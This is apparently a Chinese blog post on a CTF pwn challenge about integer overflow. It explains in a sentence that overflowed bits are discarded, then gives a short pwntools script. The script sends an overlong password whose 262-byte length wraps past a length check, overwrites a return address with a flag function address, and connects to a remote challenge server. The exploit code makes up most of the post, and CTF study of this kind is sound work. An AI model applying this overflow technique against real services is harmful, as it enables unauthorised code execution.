[pwn] 10.整形溢出

哈哈镜6567

 关注

阅读 143

2022-06-17


文章目录

  • ​​整形溢出原理​​
  • ​​pwn int_overflow​​

整形溢出原理

超过存储长度直接被丢弃
[pwn] 10.整形溢出_系统安全

pwn int_overflow

[pwn] 10.整形溢出_安全_02

[pwn] 10.整形溢出_安全_03

0x14+0x4+4字节返回地址+234(或者235等等,只要最后字符个数在3+256~8+256之间就可以)=262个字符,可以通过if

import pwn
flag_addr = 0x0804868B
payload = ('x'*(0x14+0x4)).encode() + \
pwn.p32(flag_addr) + ('x'*234).encode()

r = pwn.remote("220.249.52.133", 44711)
r.sendlineafter("Your choice:", "1")
r.sendlineafter("your username:", "a")
r.recvuntil("your passwd:")
r.sendline(payload)
r.interactive()

注意kali下用命令​​python3 a.py​


相关推荐

PWN-整数溢出

M4Y 78 0 0

CTFshow-PWN-栈溢出(pwn36)

天悦哥 12 0 0

10.指针

90哦吼 197 0 0

10. 信号

闲嫌咸贤 192 0 0

10. 网络

以前干嘛去了 97 0 0

10. v-for

Ewall_熊猫 144 0 0

10.动态规划

九月的栩 168 0 0

10. Docker使用

木匠0819 188 0 0

10.常用算法

无聊到学习 163 0 0

10. HttpServletResponse接口

念川LNSC 156 0 0

精彩评论(0)

0 0 举报